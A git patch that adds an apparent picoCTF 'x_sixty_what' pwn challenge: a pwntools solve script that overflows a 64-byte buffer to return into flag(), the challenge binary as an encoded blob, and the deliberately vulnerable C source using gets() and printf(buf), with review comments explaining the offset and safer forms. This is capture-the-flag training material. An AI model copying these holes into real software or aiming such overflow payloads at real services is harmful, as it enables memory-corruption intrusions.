From acada7af66f8d0f2df6b5a544027898b761f94fa Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 21:30:47 +0200
Subject: [PATCH] pwn/x_sixty_what
---
pwn/x_sixty_what/solve.py | 33 +++++++++++++++++++++++++++++++++
pwn/x_sixty_what/vuln | Bin 0 -> 17128 bytes
pwn/x_sixty_what/vuln.c | 37 +++++++++++++++++++++++++++++++++++++
3 files changed, 70 insertions(+)
create mode 100755 pwn/x_sixty_what/solve.py
create mode 100755 pwn/x_sixty_what/vuln
create mode 100644 pwn/x_sixty_what/vuln.c
diff --git a/pwn/x_sixty_what/solve.py b/pwn/x_sixty_what/solve.py
new file mode 100755
index 0000000..999e418
--- /dev/null
+++ b/pwn/x_sixty_what/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
+ offset = 72 # found with pwndbg
+ print(f"flag: {hex(exe.sym.flag)}")
+ print(p64(exe.sym.flag))
+ payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
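Review bot: The two magic numbers in main() are left unexplained: `offset = 72 # found with pwndbg` and the `+ 5` that the comment itself says is there "for some reason". Going by vuln.c in this same patch, 72 matches the 64-byte `buf` in vuln() plus the 8-byte saved frame pointer, so the comment could read `# 64-byte buf + 8-byte saved rbp (confirmed in pwndbg)`. The `+ 5` most likely enters flag() past its prologue push so the stack stays 16-byte aligned for the libc calls inside it; that is inferred rather than visible here, so the comment should record what the disassembly showed, e.g. `# enter flag() after the prologue push to keep rsp 16-byte aligned`. Separately, `r.recvall()` has no timeout and blocks if the remote never closes the connection; `r.recvall(timeout=5)` bounds it.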
diff --git a/pwn/x_sixty_what/vuln b/pwn/x_sixty_what/vuln new file mode 100755 index 0000000000000000000000000000000000000000..4f16c682402bb9c5118d12336017934cba3223eb GIT binary patch literal 17128 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 literal 0 HcmV?d00001 diff --git a/pwn/x_sixty_what/vuln.c b/pwn/x_sixty_what/vuln.c new file mode 100644 index 0000000..fc76b33 --- /dev/null +++ b/pwn/x_sixty_what/vuln.c @@ -0,0 +1,37 @@ +#include +#include +#include +#include +#include + +#define BUFFSIZE 64 +#define FLAGSIZE 64 + +void flag() { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + printf(buf); +} + +void vuln(){ + char buf[BUFFSIZE]; + gets(buf); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + gid_t gid = getegid(); + setresgid(gid, gid, gid); + puts("Welcome to 64-bit. Give me a string that gets you the flag: "); + vuln(); + return 0; +} +
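Review bot: This is deliberately vulnerable challenge source, but nothing in the file says so and a reader could mistake it for ordinary code; a header comment such as `/* Intentionally vulnerable CTF challenge source - do not reuse. */` would make that explicit. The bug the exercise relies on is `gets(buf)` in vuln(), which writes into the 64-byte stack buffer with no bound; in real code the bounded form is `fgets(buf, sizeof buf, stdin)`, and builds should keep the stack protector and PIE enabled (solve.py uses a fixed symbol address, which suggests this binary has neither, though the build flags are not shown). In the same hunk, `printf(buf)` in flag() passes file contents as a format string where `fputs(buf, stdout)` is the safe form, the result of `fgets(buf,FLAGSIZE,f)` is not checked before `buf` is printed, and `f` is never closed. The `#include` lines appear to have lost their header names on this page.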